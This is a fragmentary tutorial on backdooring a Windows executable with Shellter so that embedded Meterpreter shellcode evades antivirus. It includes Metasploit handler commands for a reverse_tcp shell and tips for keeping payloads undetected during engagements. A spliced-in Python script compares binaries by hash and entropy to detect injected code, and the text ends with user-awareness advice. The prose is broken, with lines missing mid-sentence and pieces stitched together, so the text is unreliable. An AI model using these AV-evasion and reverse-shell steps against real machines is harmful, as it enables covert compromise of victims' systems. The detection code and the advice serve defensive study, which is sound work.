for pentesters was revealed at B-Sides Lisbon earlier this month.
Updates include stronger obfuscation through a custom encoder and a
polymorphic decoder. This version also saves a few steps by bundling
the most common Meterpreter payloads.
.exe file, adds the shellcode to it and then modifies the file so that
it evades AV. The program's automatic mode makes the whole process
painless. In this tutorial I used the latest version of Kali Linux and
a Windows 7 virtual machine.
contain the newest 4.0 version yet. To get the latest, instead of running
'apt-get install shellter', download the ZIP file and extract it to the
'/etc/share' folder.
terminal, or use 'wineconsole shellter' from '/etc/share/shellter' if you
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
And we have a shell!
Compare the size of the backdoored exe to the original one. They are
exactly the same size, because the shellcode was written into existing
space inside the PE rather than appended as a new section. File size is
therefore useless as an integrity check; compare hashes instead. Now
upload the backdoored exe to VirusTotal and scan it for malicious
content (keep in mind that VirusTotal shares uploaded samples with AV
vendors, so a payload uploaded there will usually be signatured soon
afterwards; on a real engagement use a scanner that does not distribute
samples):
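The "same size, different file" point above is worth checking mechanically. The following is an added example (not code from the original post, and not part of Shellter): it compares an original and a suspect binary by size, SHA-256 and exact differing byte ranges, and measures the Shannon entropy of each modified region, since encoded shellcode dropped into a zero-filled code cave jumps from 0 bits/byte to close to 8. The two "executables" are constructed byte strings standing in for real PE files; the payload is a deterministic SHA-256-derived stream used only so the demo is reproducible offline.

```python
import hashlib
import math

# --- Constructed sample data (assumption: stand-ins, NOT real PE files) ---
# "Original" binary: headers, some code bytes, a 512-byte zero run (the
# code cave), then more data.
ORIGINAL = (b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + bytes(range(256)) * 4
            + b"\x00" * 512 + b"CC" * 256)
CAVE_OFFSET = 2 + 62 + 4 + 1024          # first byte of the zero-filled cave
PAYLOAD_LEN = 400                        # fits inside the 512-byte cave


def _fake_encoded_payload(n: int, label: bytes = b"demo-payload") -> bytes:
    """Deterministic high-entropy bytes standing in for an encoded payload.
    Zero bytes are mapped to 0x01 so the injected region is contiguous."""
    stream = b"".join(hashlib.sha256(label + bytes([i])).digest()
                      for i in range(n // 32 + 1))
    return bytes(b or 1 for b in stream[:n])


# "Backdoored" binary: identical except the cave now holds the payload.
BACKDOORED = (ORIGINAL[:CAVE_OFFSET]
              + _fake_encoded_payload(PAYLOAD_LEN)
              + ORIGINAL[CAVE_OFFSET + PAYLOAD_LEN:])


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for an empty or constant buffer, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def differing_ranges(a: bytes, b: bytes):
    """Half-open (start, end) byte ranges where a and b differ,
    including a length mismatch at the tail."""
    ranges, start = [], None
    total = max(len(a), len(b))
    for i in range(total):
        x = a[i] if i < len(a) else None
        y = b[i] if i < len(b) else None
        if x != y:
            if start is None:
                start = i
        elif start is not None:
            ranges.append((start, i))
            start = None
    if start is not None:
        ranges.append((start, total))
    return ranges


def compare(original: bytes, suspect: bytes) -> dict:
    """Report whether size/hash match, where the bytes differ, and the
    entropy of each differing region before and after modification."""
    diffs = differing_ranges(original, suspect)
    return {
        "same_size": len(original) == len(suspect),
        "same_sha256": sha256(original) == sha256(suspect),
        "diff_ranges": diffs,
        # (start, end, entropy_before, entropy_after)
        "entropy_shift": [
            (s, e,
             round(shannon_entropy(original[s:e]), 2),
             round(shannon_entropy(suspect[s:e]), 2))
            for s, e in diffs
        ],
    }


if __name__ == "__main__":
    report = compare(ORIGINAL, BACKDOORED)
    print("same size:   ", report["same_size"])
    print("same sha256: ", report["same_sha256"])
    for s, e, before, after in report["entropy_shift"]:
        print(f"modified 0x{s:x}-0x{e:x}: entropy {before} -> {after} bits/byte")
```

Run against real files by reading both with `open(path, "rb").read()` and passing them to `compare`. The size check passes, the hash check fails, and the entropy shift points straight at the injected region, which is the kind of check an integrity-monitoring or forensic workflow should rely on instead of file size.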
that will bypass AV can be created pretty easily. AV is great, but it can't
stop everything, so you need to train your company's users to be vigilant
when using internet sites, social media and e-mail. Avoid suspicious
websites, don't allow website popups or warnings to install anything, and
never open unsolicited or suspicious attachments in e-mails. If you
don't know whether you should click on something, ask your IT department. A
little user vigilance can go a long way toward protecting your network!